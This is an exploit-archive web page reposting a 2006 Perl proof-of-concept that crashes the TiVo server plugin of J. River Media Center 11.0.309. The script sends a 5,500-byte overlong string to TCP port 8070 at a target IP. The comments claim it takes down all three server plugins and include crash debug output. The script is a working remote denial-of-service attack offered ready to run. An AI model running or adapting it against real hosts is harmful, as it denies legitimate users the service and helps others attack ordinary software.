首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
J. River Media Center 11.0.309 Remote Denial of Service PoC
来源:vfocus.net 作者:vfocus 发布时间:2006-09-06  

#!/usr/bin/perl
##Credit to n00b for finding this bug..^ ^
############################################################################
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull exploitation.
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Adresses.
#Shout's to aelph and every-one who has helped me over the year's.
#############################################################################
# X Microsoft Visual C ++ Runtime Library
#
# Buffer overrun detected!
#
# C:\Program Files\J River\Media Center 11\Media center.exe
#
# A Buffer overrun has been detected which has corrupted the program's
# internal state. The program cannot safely continue execution and must
# be now terminated.
# Bah fucking shame..
##############################################################################
#o/s info: win xp sp.2 Media Center 11.0.309 (not registered)
# \\ DEBUG INFO //
#
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na
pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
#SharedUserData!SystemCallStub+0x4:
#7ffe0304 c3 ret
##############################################################################

print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b \n";

use IO::Socket;

$ip = $ARGV[0];

$payload = "\x41"x5500;

if(!$ip)
{

die "you forgot the ip dumb nut\n";

}

$port = '8070';

$protocol = 'tcp';


$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is running on the port\n";


print $socket $payload;

close($socket);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SoftBB 0.1 (cmd) Remote Comman
·PhpCommander <= 3.0 Remote
·pHNews <= alpha 1 (template
·RaidenHTTPD 1.1.49 (SoftParser
·Tr Forum 2.0 SQL Injection / B
·X11R6 <= 6.4 XKEYBOARD Loca
·PmWiki <= 2.1.19 (Zend_Hash
·X11R6 <= 6.4 XKEYBOARD Loca
·Annuaire 1Two 2.2 Remote SQL I
·X11R6 <= 6.4 XKEYBOARD Loca
·TikiWiki <= 1.9 Sirius (jho
·Open Bulletin Board <= 1.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved